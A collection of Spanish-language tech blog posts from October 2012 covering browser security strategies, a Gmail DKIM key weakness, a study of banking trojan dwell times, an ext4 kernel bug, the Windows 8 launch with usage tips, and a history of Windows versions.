En los 90 los navegadores que se usaban principalmente eran Netscape e Internet Explorer. Los dos un desastre en seguridad (como mandaban los tiempos). Pero no importaba demasiado a los atacantes. La industria del malware no estaba tan desarrollada, no existían kits de explotación tan perfeccionados y además, se disponían de otros medios para infectar a las víctimas: el email y el ataque directo a los puertos y servicios. Los sistemas y programas de correo no eran tan efectivos contra el malware, los usuarios no estaban tan concienciados y además, muchos se conectaban directamente a Internet sin cortafuegos entrante. Explotar vulnerabilidades en el navegador era sencillo pero no tan necesario.

En los 2000 
La guerra la ganó Internet Explorer y se relajó. El cortafuegos se instauró como norma y además los usuarios se conectaban por ADSL, por lo que solían permanecer detrás del cortafuegos del router. El spam se controló en parte y el usuario se concienció. Los atacantes tenían que saltar al navegador y aprovechar las vulnerabilidades si querían infectar. Contaban con una enorme ventaja con Internet Explorer: era ubicuo e inseguro. El problema creció y aparecieron alternativas serias: Firefox y Chrome. La guerra se centró no tanto en la cuota de uso (que también, cómo no) sino en ofrecer elementos diferenciadores: seguridad en profundidad. La cuota llegaría después.

Hoy 
Hoy el panorama es curioso. La batalla la ha ganado un "recién llegado" como Chrome por (varias razones, pero principalmente por) centrarse en la seguridad. Pero no cualquier tipo de seguridad (dejemos al margen quién detecta más phishing o malware), sino en la defensiva. Si bien es el navegador con mayor número de fallos, es el más complejo de explotar.


Microsoft tomó otro enfoque. Apostó fuertemente por el Security Development Lifecycle (SDL), que implicaba el desarrollo de sus programas desde cero teniendo en cuenta la seguridad. El resultado es que su número de vulnerabilidades ha descendido considerablemente en los últimos dos años... pero las que hay son muy explotadas. Chrome se centró no tanto por bajar el número de fallos, sino en que estos no fueran explotables. Apostó por separar las pestañas en procesos con bajos niveles de integridad, por el ASLR y el DEP en sus procesos, por meter los plugins en sandbox, por las actualizaciones automáticas "sin permiso" y por motivar fuertemente a los investigadores para que le detectaran los fallos de seguridad (paga bien cada vulnerabilidad encontrada y reportada). De hecho, se atrevió a ofrecer hasta 1.000.000 de dólares por la ejecución de código arbitrario en Chrome bajo Windows 7. Lo consiguieron, pero solo el equipo de Vupen después de 6 largas semanas de trabajo. ¿Están los atacantes a la altura? Por supuesto... pero de lograrlo, se deben plantear si no es mejor reportarlas de forma legítima. Así ha conseguido la "paradoja": que Chrome, siendo el que más fallos de seguridad acumula año tras año, y con una cuota de mercado más que respetable, sea el más seguro "ahí fuera". Tiene el honor de ser aborrecido por una de las mayores amenazas web actuales: el kit de explotación "Blackhole", que no lo intenta atacar.

Internet Explorer por el contrario, encuentra que aunque con menos fallos, su nivel de exposición es mayor: se le acumulan los ataques (a través de 0-day) y aunque ha mejorado el tiempo de respuesta (el último fue corregido en algo más de una semana) sigue siendo lenta para lo que demanda hoy el mercado. Si apuntamos a la "estricta" definición de "0-day", lo que importa es que el navegador esté siendo atacado a través de las vulnerabilidades, no solo que no estén parcheadas. Y ahí, Internet Explorer sale perdiendo. Una buena parte de sus vulnerabilidades críticas se encuentran ya siendo aprovechadas por atacantes, y esto hace que sus usuarios tengan un alto grado de exposición que no se da en otros.

Es cierto que IE también separa las pestañas en procesos con bajos privilegios, aprovecha DEP y ASLR... pero la motivación de los atacantes también es mayor para poder eludir estos problemas (buscan en el mercado negro la recompensa que no ofrece Microsoft) y su sandbox no es la de Chrome. Ha salido perjudicado de esta guerra de la seguridad... y quizás, por esa misma razón, está perdiendo la guerra por la cuota de mercado.

Mientras, Opera, con un número de fallos y una cuota menor, todavía no ha implementado medidas de seguridad modernas (y por ello es atacado). Firefox, en situación parecida, no ha sabido hacer frente a Chrome pese a sus ventajas. Ambos pierden relevancia poco a poco...

En definitiva, tenemos de nuevo que revisar parámetros establecidos. No importa tanto el número de vulnerabilidades y la cuota de uso ya no es excusa. Lo que importa es cómo se gestiona la seguridad a todos los niveles y sobre todo, reconocer que el software tendrá vulnerabilidades y ese factor no va a eliminarse nunca... lo necesario es centrarse principalmente en trabajar para que su impacto sea mínimo y que resulten endemoniadamente complejas de explotar... Ese ha sido el genial movimiento de Chrome.

Más información:

Pwnium: rewards for exploits
http://blog.chromium.org/2012/02/pwnium-rewards-for-exploits.html 
 

sábado, 27 de octubre de 2012

Descubren por azar una vulnerabilidad en el correo de Google.


Descubren por azar una vulnerabilidad en el correo de Google.
 
 
El matemático Zach Harris, especializado en Linux, recibió en su buzón de correo un email procedente de un buscador de talentos de Google. En él se le preguntaba acerca de su disposición para trabajar con la compañía. El desarrollador pensó que el conjunto del mensaje tenía algo raro e investigando encontró una vulnerabilidad en el correo electrónico. Creyendo que se trataba de uno de los retos a los que se somete a los futuros empleados, aprovechó el agujero de seguridad para suplantar la identidad de los fundadores Sergey Brin y Larry Page.
La vulnerabilidad descubierta ha resultado ser un agujero de seguridad que permitía a alguien, con las capacidades y el interés suficiente, enviar emails suplantando la identidad de cualquier empleado de Google.
El email que recibió Harris alababa su “pasión por Linux y por programar” y el emisor quería saber si estaba interesado en “explorar confidencialmente oportunidades con Google”, para un puesto de ingeniero enfocado a comprobar la fiabilidad de los servicios de la compañía. Y precisamente ésa es la función que este matemático de 35 años ha cumplido, aunque sin estar en nómina de la empresa (y sin ser consciente de lo que hacía).
Harris se mostró escéptico en un primer momento, ya que para alguien con sus capacidades el puesto que le ofrecían no parecía el más adecuado. Pensó que podría tratarse de una broma y examinó el contenido del email. Todo parecía correcto, pero se dio cuenta de un detalle. Google usaba una clave criptográfica débil para certificar a los receptores de los correos que éstos provenían en efecto de un dominio corporativo legítimo.
Esta clave (DomainKeys Identified Mail o DKIM) debe tener al menos una extensión de 1.024 bits, según los estándares, pero Google utilizaba en el mail únicamente 512 bits. Como Harris pensó que el gigante de Mountain View no dejaría tan desprotegidos sus correos, el matemático creyó que se trataba de uno de los retos a los que la firma somete a candidatos para un empleo.
Se propuso, por tanto, superar la prueba, aunque no tenía especial interés en el puesto de trabajo. “Pensé que era divertido. De verdad quería resolver el problema y probar que podría hacerlo”, afirma.
Cuando lo tuvo resuelto Harris utilizó la vulnerabilidad para enviar un email a cada uno de los fundadores de Google, Sergey Brin y Larry Page, haciéndose pasar en cada caso por el otro. Lo organizó todo para que las respuestas le llegaran a su correo, pero no llegó nada y a los dos días se dio cuenta de que la clave criptográfica de Google había incrementado su seguridad.
Había resultado ser una vulnerabilidad real lo que Harris había descubierto. Pero no se quedó ahí. Investigando posteriormente comprobó que el mismo problema con el correo existía para un largo listado de compañías punteras. PayPal, Yahoo, Amazon, eBay, Apple, Dell, LinkedIn, Twitter, SBCGlobal, US Bank, HP, Match.com y HSBC también tenían un agujero de seguridad similar.

El malware bancario sobrevive un promedio de 25 días en tu PC si tienes un antivirus instalado y 81 si no.


El malware bancario sobrevive un promedio de 25 días en tu PC si tienes un antivirus instalado y 81 si no.
 
Ya bastante que he tocado el tema del malware y en especifico, del malware bancario que se ha incrementado exponencialmente en América Latina. Pues bien, un informe asegura que el malware bancario sobrevive una media de 25 días si tienes un antivirus instalado, para muchos eso es una cifra aceptable solo que ya para entonces el malware ya cumplió con su cometido.
 
SurfRight ha publicado una noticia interesante. A través de su producto HitmanPro, ha realizado un estudio durante un año en 2.5 millones de usuarios. Ha determinado que el malware más peligroso (familias conocidas de troyanos bancarios) perduran de media en un sistema con antivirus 25 días y si no lo tiene, 81.
 
¿Qué se puede deducir de estas cifras?

HitmanPro es una especie de antivirus en la nube. 2.5 millones de usuarios lo han descargado y han analizado con él su sistema como protección adicional. Este programa hizo lo siguiente: detectaba la existencia de troyanos bancarios: Zeus, Citadel, SpyEye y Tinba. Si los encontraba, determinaba desde cuándo estaban ahí (fecha de instalación) y si el usuario mantenía corriendo otro antivirus. Después lo limpiaba.

Así, han determinado que el sistema con antivirus alojaba el troyano desde hacía 25 días de medía, y el que no tenía antivirus, unos 81... Nos preguntamos cómo han confirmado la fecha de infección porque, aunque se puede conocer con cierta seguridad, es muy raro que los binarios utilicen la fecha real de creación... suele estar manipulada. Pero no se tienen muchos más detalles técnicos.

Lo primero es tener claro que este es un estudio de una casa antivirus, creado con la intención clara de vender su producto y mostrar su eficacia. Por tanto, no debe ser tomado como imparcial, pero sí como un experimento curioso.

¡25 días oculto incluso con antivirus es mucho tiempo!

Claro. Y aun así no hay que olvidar que el producto HitmanPro por definición no debe ser infalible, por lo que seguro que no han detectado todos los troyanos de estas características en los equipos analizados. Muchos de esos usuarios, después de escanear con ese programa, seguirán infectados.

Estos 25 días de media de infección con antivirus activos no demuestran la ineficacia del antivirus, sino la sofisticación del malware. Además, esconde algo interesante: el malware, ni se molesta en desactivar a su enemigo. Una vez instalado en el sistema, el malware podría intentar
desactivar el motor residente o al menos bloquear sus actualizaciones.
 
Técnicamente, no es complicado (aunque también habría que valorar que esto introduce una pista para delatar su existencia). Aunque algunas familias lo hacen, en concreto no es habitual verlo en estos troyanos bancarios. ¿Por qué? Porque confían tanto en su propia capacidad de perpetuación en el sistema (y tan poco en la efectividad de los antivirus), que no se preocupan de que en él conviva un antimalware que, tarde o temprano podría cazarlo.

¿81 días infectado es peor que 25?

Puede ser un consuelo. Pero en realidad, ¿qué tiempo de infección es aceptable? Por parte del antivirus, una vez infectado, queda demostrado que ha fallado en su capacidad de descubrir el exploit (si lo hubiera), las heurísticas y detectar el comportamiento. Tan solo le queda actualizar las firmas y esperar que se realice un análisis del equipo. 
La mayoría de los antivirus actualizan sus firmas varias veces al día, por lo que el sistema de firmas, parece que tampoco es suficiente.

Para el troyano, esos 25 días de media o periodo de infección, les son más que suficientes. Desde el punto de vista del atacante, el tiempo necesario para que un troyano de estas características sea efectivo y cumpla su función depende de los hábitos del usuario. Lo que quiere es que se conecte a su banco online, así que el periodo de consulta de su banca online (¿diario? ¿semanal?) es su límite. Durante esos 25 días, los habituales de la banca electrónica la usarán, y en ese momento se verán afectados y el troyano intentará robar sus cuentas. Objetivo cumplido.

Por tanto, efectivamente 81 es mejor que 25... pero si hablamos de troyanos bancarios de este tipo, siempre que el periodo de infección sea más largo que el hábito de consulta de banca online con el sistema afectado... no será determinante el número de días que conviva el equipo con el malware. Lamentablemente, la detección más "efectiva" (por habitual) en estos casos, suele ser la constatación de un desfalco en la cuenta bancaria.

Más información:

Antivirus shortens the life-time of financial malware
http://hitmanpro.wordpress.com/2012/10/23/antivirus-shortens-the-life-time-of-financial-malware/

viernes, 26 de octubre de 2012

Descubren un bug en la última versión estable del kernel Linux.


Descubren un bug en la última versión estable del kernel Linux.
Definido como un fallo escurridizo “tipo Lance Armstrong”, difícil de detectar, provoca la pérdida de datos del sistema a través de una grieta en la aplicación ext4.
El desarrollador Theodore “Ted” Ts’o ha publicado una serie de parches para lo que ha definido como un bug “tipo Lance Armstrong” presente en el núcleo de Linux.
Esto es, cuyo comportamiento irregular no dispara las alarmas de los test pero provoca que el kernel funciona de manera diferente a lo previsto. Y que ha sido especialmente difícil de localizar, ya que sólo se manifiesta al reiniciar dos veces un sistema en un periodo de tiempo relativamente corto.
El problema en cuestión provoca la pérdida de datos por una grieta en la aplicación ext4, que se introdujo con la versión 3.6.2 de Linux hace poco más de una semana. Y se produce cuando el bloque de inicio en el sistema de archivos es cero. El sistema de archivos se monta y desmonta con tanta rapidez que el registro del diario no alcanza la oportunidad de ser escrito por completo.
La primera vez que esto sucede, el controlador ext4 puede recuperar el diario sin que se produzcan efectos adversos. Pero, si se el fallo se repite por segunda vez, los datos de la sesión de montaje más reciente se escribirán antes que los datos de la fase anterior, dando lugar a bloques de metadatos realmente revueltos.
Además de afectar a Linux 3.6.2 y versiones posteriores, se ha seguido el rastro de este bug en la rama estable del kernel 3.5.x. Actualmente no se sabe cuándo se parchearán esta última versión, aunque los desarrolladores de Linux siguen trabajando para resolver el problema.
 
Más información:
 

Microsoft presentó oficialmente, Windows 8.


Microsoft presentó oficialmente, Windows 8.
 
Después de tanto esperar, Microsoft presenta oficialmente a Windows 8 a los consumidores, Steven Sinofsky, la persona a cargo de la división de Windows y Windows Live en Microsoft, dio inicio a la presentación en vivo que organizó Microsoft un día antes de poner a la venta Windows 8. El sistema operativo estará disponible a partir de mañana 26 de octubre alrededor del mundo.
Sinofsky comenzó con un repaso a la historia de la plataforma, informando por ejemplo, que Windows 7 ha vendido más de 670 millones de licencias alrededor del mundo, remontándose luego al pasado recordando cuando Windows 95 era popular, hasta el día de hoy cuando Windows 8 promete entregar una experiencia nueva al usuario. El ejecutivo aseguró que gracias al beta público (Consumer Preview), el software ha sido probado por más de 1.240 millones de horas antes de su lanzamiento general.
Asimismo, la tienda de aplicaciones para Windows 8 (Windows Store) estará disponible desde 231 países, marcando la gran apertura de esta plataforma para obtener software.
Sobre Windows RT se destacaron los beneficios que todos ya conocemos y provienen del uso de plataforma ARM de hardware (menor consumo energético, etc), incluyendo la información de que existen 420 millones de periféricos con soporte para Windows RT y funcionarán bien en él, como impresoras, mouse, teclados, y un largo etcétera.
Luego, y como ya casi es tradición en los lanzamientos de Windows, se mostraron algunos de los nuevos equipos que darán vida a la generación más reciente de portátiles y PCs de escritorios, teniendo casi todos en común dos características: que son ultra-delgados y poseen pantallas táctiles.
Como era de esperarse, el CEO de Microsoft, Steve Ballmer, también hizo su aparición en el escenario, hablando de las generalidades de Windows 8 y cómo los diferentes formatos de equipos revolucionarán la industria: convertibles, híbridos, tabeltas, PCs de escritorio, notebooks… se dice que habrá “un PC para cada tipo de persona“, dando en el gusto a toda clase de usuarios alrededor del mundo.
Consejos para usar Windows 8 sin morir en el intento
 
Windows 8 es muy bonito, se supone que ahora es más fácil de usar, y se supone que es muchas cosas, pero la realidad es que el cambio desde Windows 7 (o desde Vista o desde el aún más antiguo XP) a Windows 8 es un tanto drástico. Metro, a pesar de ser una interfaz fácil de usar, no es necesariamente el sistema más intuitivo, sobre todo para quienes están acostumbrados a la tradicional interfaz de Windows que podrían tener problemas para entender el concepto Metro/Desktop.
Creo que ya he comentado bastante sobre las bondades de Windows 8 y hasta como instalarlo sin tener que desinstalar Windows 7. Ahora bien, acá unos consejos prácticos para hacer que su primera experiencia con Windows 8 no sea traumatizante:

#1 No trates de entender el estilo moderno

Ya sea Desktop o Laptop, Windows 8 por defecto te presentará la nueva interfaz gráfica llamada “moderna” o “Metro”, que a grandes rasgos son un montón de cuadritos organizados como si fuera la pantalla de un smartphone o una tableta. Para hacer una comparación, la pantalla estilo moderno viene a reemplazar al menú de inicio tradicional, que desaparece del sistema operativo. De este modo, en la interfaz moderna encontraremos lo que antes estaba en el menú: Acceso a aplicaciones, carpetas y otros archivos.
El comportamiento de Metro está pensado para ser amigable con los dedos, es decir, para funcionar en un tablet. Esto no es malo, de hecho, si no eres un “power user” es mejor usar Metro que utilizar el escritorio regular.
Desde Metro puedes acceder a aplicaciones simples sin necesidad de entrar al escritorio, puedes ver tus películas, escuchar tu música, ver tu correo, ver tus redes sociales, navegar por internet, revisar las condiciones del tiempo, ver mapas, jugar, hacer compras en la tienda de Microsoft y en general, usar todo lo que sea entretenimiento.
Si necesitas pasar al “modo productividad” y quieres usar el escritorio tradicional, basta con presionar el recuadro que dice “Desktop” (escritorio) y listo, podrás usar Windows 8 como si fuera Windows 7, pero, en caso de que por alguna razón alguien borre ese recuadro, basta con desplazar tu mouse hacia donde solía estar botón de inicio y “voilá” aparecerá una pestaña de búsqueda.

#2 Ten en mente las esquinas

Cuando mueves el puntero del mouse a una de las cuatro esquinas de la pantalla, o bien lo pegas hacia el lado derecho de la pantalla (mientras estás en Metro) algo mágico puede ocurrir.
De tu lado derecho está la tan buscada barra de tareas (los llamados “charms”) de Windows 8, desde ahí puedes cambiar los ajustes de Windows, configurar el brillo de la pantalla, iniciar una búsqueda, conectarte a WiFi, etc.
Puedes hacer muchísimas cosas, pero creo que la más importante de todas y la que más busca la gente, es que puedes apagar tu computadora desde ahí, solo basta con que hagas clic en el botón de settings (configuración) y después en power (energía). Una manera más fácil de llegar a este mismo menú es presionando en el teclado la tecla Windows+i.
Las esquinas por su parte tienen otras funciones que remplazan la barra de tareas tradicional, la esquina izquierda inferior te manda directo al desktop y la esquina superior del mismo lado te muestra las aplicaciones que estas usando.

#3 Personaliza Metro

No tengas miedo de experimentar, borra recuadros, agrega recuadros, hazlos más grandes, hazlos más chicos, agrúpalos a tu gusto; métete a la tienda y descarga aplicaciones, por un momento trata de olvidar el viejo escritorio y trata de acostumbrarte a la nueva experiencia, no hay nada malo que puedas hacer ahí.
Ten en cuenta que muchas de las funciones de Metro están pensadas para hacer tu vida en línea más fácil, si tienes correo de Outlook (antes Hotmail), si tienes cuenta de Messenger, de Xbox Live, Flickr, Facebook, todo eso, procura configurarlas, así podrás disfrutar desde el primer día las ventajas de esta nueva interfaz.

#4 Crea diferentes cuentas de usuario

Si la computadora donde va a estar instalado Windows 8 va a ser compartida, es muy recomendable que cada usuario tenga su propia cuenta, de esta forma cada uno tendrá su propia configuración personalizada y no habrá ninguna necesidad de estar borrando o agregando nombres de usuario y contraseñas a los diferentes servicios. Por el contrario, al ingresar con tu propia cuenta de Windows 8, el sistema automáticamente cargará toda tu información y preferencias para que reanudes tu sesión como si nada hubiera pasado.
Otra de las ventajas de crear tu usuario en una máquina con Windows 8 es que puedes sincronizar parte de tu trabajo y datos personales en todos tus equipos, por ejemplo, si tomas una foto y la transfieres a la memoria de tu tableta, al sincronizar el contenido esta foto se enviará por SkyDrive a tus otros equipos (Laptop, Smartphone) así cuando llegues a casa o saques el teléfono de tu bolsillo, tendrás el mismo contenido.

#5 Si vas a comprar Windows 8, que sea antes del 31 de enero

La actualización de Windows XP, Vista y 7 a Windows 8 sólo costará USD$39,90, un precio realmente bajo por el nuevo sistema operativo, pero ojo, que hay un plazo.
El precio de la actualización efectivamente será de USD$39,90 pero sólo hasta el 31 de enero del 2013, después de esa fecha solo Dios sabe cuanto vaya a costar. Quiero hacer énfasis en que estás comprando una “actualización”; esto quiere decir que para poder instalarla debes tener forzosamente uno de los sistemas operativos anteriores ya instalados y corriendo en el equipo que pretendes actualizar.
 

Un paseo desde Windows 95 hasta Windows 8.


Un paseo desde Windows 95 hasta Windows 8.
 
Evolucion-logo-windows
 
Hasta ahora, las criticas que escucho sobre Windows 8 son en cuanto a su interfaz más que en su desempeño. La razón es clara, muchos llevamos más de 25 años usando Windows de una manera y de pronto, de la noche a la mañana, nos cambian la forma de usarlo, pero eso es más sicológico que otra cosa ya que como he comentado antes, llevo algunas semanas usándolo y ya ni recuerdo que es Windows 8, trabajo con el como si fuera Windows 7.
 
Resulta cómico mencionar que Windows XP fue el sistema operativo que he utilizado por más tiempo (11 años) y recién hace un par de meses decidí cambiarme a Windows 7 como sistema operativo principal de lo que ya había comentado antes. Pues bien, Windows 7 Ultimate SP1 apenas duro un mes como mi sistema operativo principal ya que lo cambie por Windows 8 Pro y ya he comentado bastante sobre mi experiencia con el por lo que ahora quiero invitarles a dar un paseo por los diferentes Windows y como han evolucionado en la industria de Microsoft como componentes, o software vitales para darnos soporte a otros tipos de plataformas con las que trabajamos. De ahí la importancia de conocer su evolución y pensar hacia donde vamos, es algo largo pero vale la pena.
Microsoft adopta “Windows 95″
Como nombre de producto para Chicago cuando fue publicado en Agosto de 1995. Chicago iba encaminado a incorporar una nueva interfaz gráfica que compitiera con la de OS/2. Aunque compartía mucho código con Windows 3.x e incluso con MS-DOS, también se pretendía introducir arquitectura de 32 bits y dar soporte a multitarea preventiva, como OS/2 o el mismo Windows NT.
Sin embargo sólo una parte de Chicago comenzó a utilizar arquitectura de 32 bits, la mayor parte seguía usando una arquitectura de 16 bits, Microsoft argumentaba que una conversión completa retrasaría demasiado la publicación de Chicago y sería demasiado costosa.
Microsoft desarrolló una nueva API para remplazar la API de Windows de 16 bits. Esta API fue denominada Win32, desde entonces Microsoft denominó a la antigua API de 16 bits como Win16. Esta API fue desarrollada en tres versiones: una para Windows NT, una para Chicago y otra llamada Win32s, que era un subconjunto de Win32 que podía ser utilizado en sistemas con Windows 3.1.de este modo Microsoft intentó asegurar algún grado de compatibilidad entre Chicago y Windows NT, aunque los dos sistemas tenían arquitecturas radicalmente diferentes.
Windows 95 tenía dos grandes ventajas para el consumidor medio:
Primero, aunque su interfaz todavía corría sobre MS-DOS, tenía una instalación integrada que le hacía aparecer como un solo sistema operativo (ya no se necesitaba comprar MS-DOS e instalar Windows encima). Segundo, introducía un subsistema en modo protegido que estaba especialmente escrito a procesadores 80386 o superiores, lo cual impediría que las nuevas aplicaciones Win32 dañaran el área de memoria de otras aplicaciones Win32. En este aspecto Windows 95 se acercaba más a Windows NT, pero a la vez, dado que compartía código de Windows 3.x, las aplicaciones podían seguir bloqueando completamente el sistema en caso de que invadiesen el área de aplicaciones de Win16.
Tenía también como novedad el incluir soporte para la tecnología Plug&Play. Windows 95 se convertiría en el primer gran éxito de los de Redmond a nivel mundial. La evolución de Internet y la potencia de los equipos, cada vez más capaces, dio lugar a un binomio en el que Intel y Microsoft dominaban el panorama mundial con solvencia. Los fabricantes comenzaban a volcarse en este sistema a la hora de sacar sus controladores de dispositivos y, aunque con algunos problemas por incompatibilidades inevitables, el éxito de la plataforma fue absoluto.
Mas adelante fue lanzada una versión con compatibilidad para USB (1.0) que permitía ejecutarse en computadores (Ordenadores) con pocas prestaciones en Hardware. Esta versión salió al mercado en octubre de 1998.
Windows98
El 25 de Junio de 1998 llega Windows 98. Incluía nuevos controladores de hardware y el sistema de ficheros FAT32 (también soportado por Windows 95, OSR2 y OSR 2.5) que soportaba particiones mayores a los 2 GB permitidos por Windows 95. Dio soporte también a las nuevas tecnologías como DVD, FireWire, USB o AGP. Era novedosa también la integración del explorador de Internet en todos los ámbitos del sistema.
Pero la principal diferencia de Windows 98 sobre Windows 95 era que su núcleo había sido modificado para permitir el uso de controladores de Windows NT en Windows 9x y viceversa. Esto se conseguiría con la migración de parte del núcleo de Windows NT a Windows 98 aunque este siguiera manteniendo su arquitectura MS-DOS/Windows GUI. Esto permitiría la reducción de costes de producción, dado que Windows NT y Windows 98 ahora podrían utilizar casi idénticos controladores.
Windows 98 Second Edition (SE):
A principios de 1998 se desarrolló este sistema operativo, saliendo al mercado a finales de 1998 cuando Microsoft sacó al mercado Windows 98 Second Edition, cuya característica más notable era la capacidad de compartir entre varios equipos una conexión a Internet a través de una sola línea telefónica.
También eliminaba gran parte de los errores producidos por Internet Explorer en el sistema. Esta versión es la más estable de todas las de esta serie, y aún se sigue utilizando en muchos equipos.
Mejorando en si dos cosas importantes:
- El grave error de solicitud de Licencia que simplemente de puede dejar pasar por alto en la instalación cuando se copian los archivos con extensión “.CAB” (sin comillas) a la unidad de disco duro de la computadora (CPU u ordenador) en la primera versión de este sistema operativo.
- Se corrigen las extensiones de archivo y aplicaciones para una optimización y mejor administración de memoria virtual, reduciendo así los famosos mensajes de error en pantalla azul.
Windows Millenium Edition (ME)
En 2000 Microsoft introdujo Windows ME que era una copia de Windows 98 con más aplicaciones añadidas. Windows ME fue un proyecto rápido de un año para rellenar el hueco entre Windows 98 y el nuevo Windows XP, y eso se notó mucho en la poca estabilidad de esta versión.
En teoría Windows 2000 iba a ser la unificación entre las dos familias de Windows, la empresarial y la de hogar, pero por retrasos se lanzó este pequeño avance. En esta versión se aceleraba el inicio del sistema y oficialmente ya no se podía distinguir entre el MS-DOS y el entorno gráfico (aunque aparecieron parches que permitían volver a separarlo como se hacía en versiones anteriores).
Esta versión no traía unidad de proceso de 16 bits, centrándose únicamente en la compatibilidad con nuevo hardware de 32 bits. Como consecuencia, sólo funcionaba correctamente con los equipos nuevos que lo tenían instalado, ya que si se instalaba sobre un equipo antiguo (mediante una actualización de software) el hardware de 16 bits era más complejo de configurar, o bien no funcionaba en absoluto.
Cabe destacar que este sistema operativo fue muy poco popular por sus continuos errores y muchas desventajas de uso(bugs). Estos inconvenientes hicieron que salvo en contadas ocasiones, sus usuarios retornaran rápidamente al uso de Windows 98, o bien que dieran el salto a Windows 2000.
Windows 2000
En este mismo año vio la luz Windows 2000, una nueva versión de Windows NT muy útil para los administradores de sistemas y con una gran cantidad de servicios de red y lo más importante: admitía dispositivos Plug&Play que venían siendo un problema con Windows NT.
La familia de Windows 2000 estaba formada por varias versiones del sistema: una para las estaciones de trabajo (Windows 2000 Professional) y varias para servidores (Windows 2000 server, advanced server, datacenter server).
Windows 2000 incorporaba importantes innovaciones tecnológicas para entornos Microsoft, tanto en nuevos servicios como en la mejora de los existentes. Algunas de las características que posee son:
Almacenamiento:
Soporte para FAT16, FAT32 y NTFS.
Cifrado de ficheros (EFS).
Servicio de indexación.
Sistema de archivos distribuido (DFS).
Nuevo sistema de backup (ASR).
Sistema de tolerancia a fallos (RAID) con discos dinámicos (software).
Comunicaciones:
Servicios de acceso remoto (RAS, VPN, RADIUS y Enrutamiento).
Nueva versión de IIS con soporte para HTTP/1.1.
Active Directory.
Balanceo de carga (clustering)
Servicios de instalación desatendida por red (RIS).
Servicios nativos de Terminal Server.
Estos avances marcan un antes y un después en la historia de Microsoft.
Windows XP (eXPerience)
La unión de Windows NT/2000 y la familia de Windows 9.x se alcanzó con Windows XP puesto en venta en 2001 en su versión Home y Professional. Windows XP usa el núcleo de Windows NT. Incorpora una nueva interfaz y hace alarde de mayores capacidades multimedia.
Además dispone de otras novedades como la multitarea mejorada, soporte para redes inalámbricas y asistencia remota. Se puede agregar inmediatamente de haber lanzado el último Service Pack (SP2) Microsoft diseñó un sistema orientado a Empresas y Corporaciones llamado Microsoft Windows XP Corporate Edition, algo similar al Windows XP Profesional, solo que diseñado especialmente a Empresas. En el apartado multimedia, XP da un avance con la versión Media Center (2002-2005). Esta versión ofrece una interfaz de acceso fácil a todo lo relacionado con multimedia (TV, fotos, reproductor DVD, Internet...)
Windows Server 2003
Sucesor de la familia de servidores de Microsoft a Windows 2000 Server. Es la versión de Windows para servidores lanzada por Microsoft en el año 2003. Está basada en el núcleo de Windows XP, al que se le han añadido una serie de servicios, y se le han bloqueado algunas de sus características (para mejorar el rendimiento, o simplemente porque no serían usadas).
Windows Vista
Windows Vista apareció en el mercado el 30 de enero de 2007. Cabe destacar los continuos retrasos en las fechas de entrega del sistema operativo.
Inicialmente se anunció su salida al mercado a inicios-mediados de 2006, posteriormente y debido a problemas durante el proceso de desarrollo, se retrasó su salida hasta finales de 2006. El último retraso traslado la fecha hasta finales de enero de 2007. Estos continuos retrasos han llevado a Microsoft a tomar diversas medidas para minimizar los gastos extras derivados de los retrasos. Por ejemplo, en Argentina, se podría comprar Windows Vista con un “ticket” que la persona adquiere al momento de comprar un nuevo PC que no tiene instalado todavía Windows Vista. Podrían canjear el ”ticket” por una copia original de Windows Vista y así actualizar su sistema.
Las diferentes versiones que se podrían adquirir son tres para el consumidor, Vista Home Basic, Vista Home Premium y Ultimate Edition y dos versiones para las empresas, Vista Business y Vista Enterprise, más Vista Starter, para los mercados emergentes. Los requisitos mínimos para que la versión básica de Windows Vista (Home Basic - Starter) funcione en un equipo son los siguientes:
Procesador de 32 bits con una velocidad mínima de 800Mhz
512 MB de RAM (para trabajar a una velocidad aceptable), se recomienda 1GB
Tarjeta Gráfica compatible con DirectX 9 con por lo menos 32MB de memoria, se recomienda 128MB, aunque esta Versión sin Aero no requiere una tarjeta muy avanzada.
Disco duro de 40GB con 15GB disponibles
Grabadora y lectora de DVD-ROM
Para obtener todas las características como Aero (Home Premium - Ultimate), hace falta un ordenador con estas características:
Procesador de 32 bits (x86) de por lo menos 1Ghz o un procesador de 64 bits (x64) a 1Ghz
1GB de RAM
Compatibilidad con gráficos DirectX 9 con un controlador WDDM, 128 MB de memoria gráfica (mínimo), Pixel Shader 2.0 y 32 bits por pixel.
Disco duro de 40GB con 15GB disponibles
Grabadora y lectora de DVD
Conexión a internet
Salida de audio
Windows 7
Windows 7 es la versión más reciente de Microsoft Windows,[Por supuesto hasta el 25 de Octubre, con la salida de Windows 8 RTM] línea de sistemas operativos producida por Microsoft Corporation. Esta versión está diseñada para uso en PC, incluyendo equipos de escritorio en hogares y oficinas, equipos portátiles, tablet PC, netbooks y equipos media center. El desarrollo de Windows 7 se completó el 22 de julio de 2009, siendo entonces confirmada su fecha de venta oficial para el 22 de octubre de 2009 junto a su equivalente para servidores Windows Server 2008 R2.
A diferencia del gran salto arquitectónico y de características que sufría su antecesor Windows Vista con respecto a Windows XP, Windows 7 fue concebido como una actualización incremental y focalizada de Vista y su núcleo NT 6.0, lo que permitiría mantener cierto grado de compatibilidad con aplicaciones y hardware en los que este ya era compatible. Sin embargo, entre las metas de desarrollo para Windows 7 se dio importancia a mejorar su interfaz para volverla más accesible al usuario e incluir nuevas características que permitieran hacer tareas de una manera más fácil y rápida, al mismo tiempo que se realizarían esfuerzos para lograr un sistema más ligero, estable y rápido.
Diversas presentaciones ofrecidas por la compañía en 2008 se enfocaron en demostrar capacidades multitáctiles, una interfaz rediseñada junto con una nueva barra de tareas y un sistema de redes domésticas simplificado y fácil de usar denominado Grupo en el Hogar, además de importantes mejoras en el rendimiento general del sistema operativo.
Luego más adelante se implemento el Service Pack 1 (SP1), con el objetivo de agregar un conjunto de actualizaciones que permitiría corregir o incrementar algún producto lanzado por la Microsoft.
Windows 7 con Service Pack 1 (SP1), conocida como la versión más estable hasta el momento. Nos ha permitido, probar muchas de las nuevas características del sistema operativo, y nos ha facilitado el uso de la misma.
Windows 7 dio a luz con diferentes versiones Starter - Professional HomePremium - Ultimate, consolidándose como uno de los mejores Sistemas Operativos hasta el momento.
Windows 8
Debemos tener siempre en cuenta que Windows 8 es un sistema pensado para el futuro. Puede que en este momento tu o tu empresa no esté pensando en adoptar este sistema, pero es interesante conocer como ayuda a resolver determinadas cuestiones en la empresa como la movilidad, seguridad, virtualización, trabajo con pantallas táctiles, etc.

Windows 8 Pro, pensando para mejorar la seguridad trabajando en movilidad 

